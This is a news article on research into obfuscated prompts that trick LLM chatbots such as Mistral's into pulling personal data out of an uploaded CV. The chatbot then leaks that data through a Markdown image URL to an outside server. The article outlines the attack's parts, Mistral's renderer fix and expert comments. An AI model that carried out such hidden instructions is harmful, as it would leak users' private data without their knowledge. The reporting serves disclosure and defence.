This Prompt Enables an AI Chatbot to Recognize and Extract Personal Information from Your Conversations

Recent research has unveiled a concerning vulnerability in the functioning of large language models (LLMs), highlighting a method that could enable attackers to extract personal information through the use of misleading or obfuscated prompts. The researchers indicated that in a real-world scenario, individuals could be deceived into thinking that an unintelligible prompt would serve a beneficial purpose, such as enhancing their resumes. They pointed to various online platforms that offer prompts for users, demonstrating the potential for exploitation by initiating conversations with chatbots and feeding them a curriculum vitae (CV). In tests conducted, this method successfully retrieved personal data from the uploaded document.

Earlence Fernandes, an assistant professor at the University of California, San Diego, who contributed to the study, remarked on the intricate nature of the attack. The obfuscated prompts must perform multiple functions: identifying specific personal information, generating a workable URL, utilizing proper Markdown syntax, and concealing any malicious intent from the user. He compared the exploit to malware, noting its capability to execute actions that the user might not have anticipated.

Fernandes further elaborated on the simplicity of this exploit, stating that typically, extensive computer coding would be necessary to achieve similar results in traditional malware. In this case, the exploit’s efficiency is evident in its ability to encapsulate complex behavior within a seemingly innocuous prompt.

In response to the research, a representative from Mistral AI expressed appreciation for their engagement, indicating that the company took immediate action to rectify the identified vulnerabilities. They addressed the situation with a medium severity classification and implemented fixes that prevent the Markdown renderer from being able to function in a way that allows external URLs to be called through the process, effectively obstructing the loading of external images.

Fernandes suggested that Mistral AI’s update exemplifies one of the first instances where an adversarial prompt has led to a modification of an LLM product, as opposed to merely filtering out troublesome prompts. However, he cautioned that restricting the capabilities of LLM agents could be counterproductive in the long run, potentially stifling innovative applications.

In a separate statement, the developers of ChatGLM emphasized that they have robust security measures in place to protect user privacy. They asserted their commitment to model security and privacy protection, indicating that open-sourcing their model allows for greater scrutiny and valuation from the community regarding its capabilities and security features.

Dan McInerney, lead threat researcher at Protect AI, commented on the implications of the study, noting that the algorithm introduced in the research is capable of generating prompts for prompt injection attacks that could result in various exploitations, including the exfiltration of personally identifiable information (PII) and misuse of tools available to LLM agents. He stated that while the methods identified are not entirely new, the research contributes to a more automated approach to LLM attacks rather than unveiling undiscovered vulnerabilities.

Furthermore, McInerney underscored the increasing risks associated with widely deployed LLM agents. As organizations delegate greater authority to these agents for performing tasks, the potential for exploitation rises significantly. He stressed that deploying LLMs that accept arbitrary user input should be regarded as a high-risk endeavor necessitating extensive security evaluations prior to their implementation.

For businesses operating in this evolving landscape, it is crucial to comprehend how AI agents can interact with data and the potential avenues for abuse. Additionally, individuals must remain vigilant regarding the information they share with AI applications and the origins of any prompts they intend to use, prioritizing security and privacy in their interactions. The dynamics of these AI models and their security implications represent a significant concern, with the ongoing developments necessitating careful consideration and proactive measures.

Source